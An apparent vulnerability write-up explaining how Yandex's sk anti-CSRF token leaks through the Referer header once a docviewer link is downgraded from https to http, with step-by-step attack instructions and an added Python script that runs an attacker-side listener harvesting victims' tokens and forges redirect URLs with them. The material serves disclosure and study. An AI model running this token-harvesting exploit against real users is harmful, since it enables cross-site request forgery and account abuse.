When you open a link in docviewer.yandex.com, the site generates a token named sk, which is used to validate redirections and also serves as an anti-CSRF token. The same sk token is used as the anti-CSRF token on
http://webmaster.yandex.ru and https://docviewer.yandex.com/r.xml. So if an attacker knows the value of your sk token, he can mount both a redirection and a CSRF attack. How can he learn the victim's token? Because
http://docviewer.yandex.com/r.xml?sk=thecsrftokenofvictim&url=evilsite is a GET request, the parameters appear in the URL, and the URL can also be changed from https to http. With the browser default of the time (no-referrer-when-downgrade), the full URL of an http page is sent in the Referer header when you click a link on it, whereas an https page linking to an http site sends no Referer at all. As a result, the attacker can use the Referer header to obtain the token.
- Upload a document that contains a hyperlink pointing to the attacker's site.
- Select the file and share it with the share button to obtain the link.
- Open that link and click the view button; you are redirected to docviewer.yandex.com.
- Change https to http in the URL so that the Referer is sent to our site.
- Send the URL to the victim and induce him to click the link to the attacker's site; the Referer header then leaks the anti-CSRF token.
Now you have his sk token, and that is the CSRF bypass.
This is a wide CSRF attack which affects other Yandex domains as well.
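The leak and the reuse of the token, modelled in Python as an added example (this is not code from the original write-up or from Yandex): an attacker-side request handler that records any sk found in an incoming Referer, plus helpers that model the browser's default no-referrer-when-downgrade behaviour (which is why the https to http change in the steps above matters) and that build the docviewer redirect URL from a leaked token. The hostname attacker.example, the listening port and the token value are constructed placeholders.

```python
"""Modelling the Referer-based sk leak and the follow-up redirect (added example)."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Mapping, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Endpoint named in the write-up; the token travels in its query string.
DOCVIEWER_REDIRECT = "http://docviewer.yandex.com/r.xml"

# Tokens the attacker's server has harvested from Referer headers.
CAPTURED: List[str] = []


def referer_is_sent(page_url: str, link_url: str) -> bool:
    """Model the no-referrer-when-downgrade default: the Referer is sent for
    http->http, http->https and https->https, but dropped for https->http."""
    page = urlsplit(page_url).scheme.lower()
    link = urlsplit(link_url).scheme.lower()
    return not (page == "https" and link == "http")


def extract_sk(referer: Optional[str]) -> Optional[str]:
    """Pull the sk parameter out of a docviewer Referer, or None if absent."""
    if not referer:
        return None
    parts = urlsplit(referer)
    if not parts.netloc.endswith("docviewer.yandex.com"):
        return None
    values = parse_qs(parts.query).get("sk")
    return values[0] if values else None


def record_referer(headers: Mapping[str, str]) -> Optional[str]:
    """Attacker-side logic: harvest sk from the request headers, if present."""
    sk = extract_sk(headers.get("Referer"))
    if sk:
        CAPTURED.append(sk)
    return sk


def simulate_click(page_url: str, link_url: str) -> Optional[str]:
    """What the attacker learns when the victim clicks link_url on page_url."""
    if not referer_is_sent(page_url, link_url):
        return None
    return extract_sk(page_url)


def build_redirect(sk: str, target: str) -> str:
    """Forge the docviewer redirect URL once the victim's sk is known."""
    return DOCVIEWER_REDIRECT + "?" + urlencode({"sk": sk, "url": target})


class RefererLogger(BaseHTTPRequestHandler):
    """Minimal handler for the attacker's site: answers 200 and logs sk."""

    def do_GET(self) -> None:
        record_referer(self.headers)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args) -> None:  # keep the console quiet
        pass


if __name__ == "__main__":
    # Constructed demonstration input: the docviewer page the victim is on.
    victim_page = DOCVIEWER_REDIRECT + "?sk=CONSTRUCTEDTOKEN&url=http://attacker.example/"
    print("https page ->", simulate_click("https" + victim_page[4:], "http://attacker.example/"))
    print("http page  ->", simulate_click(victim_page, "http://attacker.example/"))
    # Port 8080 is an assumption for the attacker's listener.
    HTTPServer(("127.0.0.1", 8080), RefererLogger).serve_forever()
```

Run stand-alone, the script first prints that the https version of the page leaks nothing while the http version leaks CONSTRUCTEDTOKEN, then starts the listener; point the document's hyperlink at it and every click appends the victim's sk to CAPTURED.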
List of affected Yandex domains:
- m.contact.yandex.com.tr, among others